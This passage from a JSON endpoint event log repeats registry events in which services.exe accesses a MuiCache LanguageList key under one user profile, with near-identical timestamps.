"{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849960000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849960000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849960000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local 
Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849960000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849960000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849960000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849960000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local 
Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849960000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849960000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849960000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849960000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": 
"C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849960000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849960000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849960000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849960000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - 
"event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849960000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849960000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849960000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - 
"timestamp": 131883570849960000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849960000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849960000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849960000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": 
"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850110000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850110000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850110000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850110000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": 
"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850110000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850110000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850110000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850110000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - 
"process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850110000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850110000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850110000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850110000, - "unique_pid": 
"{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850110000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850110000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850110000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local 
Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850110000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850110000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850110000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850110000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local 
Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850110000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850110000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850110000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850110000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": 
"C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850110000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850110000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850110000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850110000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - 
"event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850110000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850110000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850270000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - 
"timestamp": 131883570850270000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850270000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850270000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": 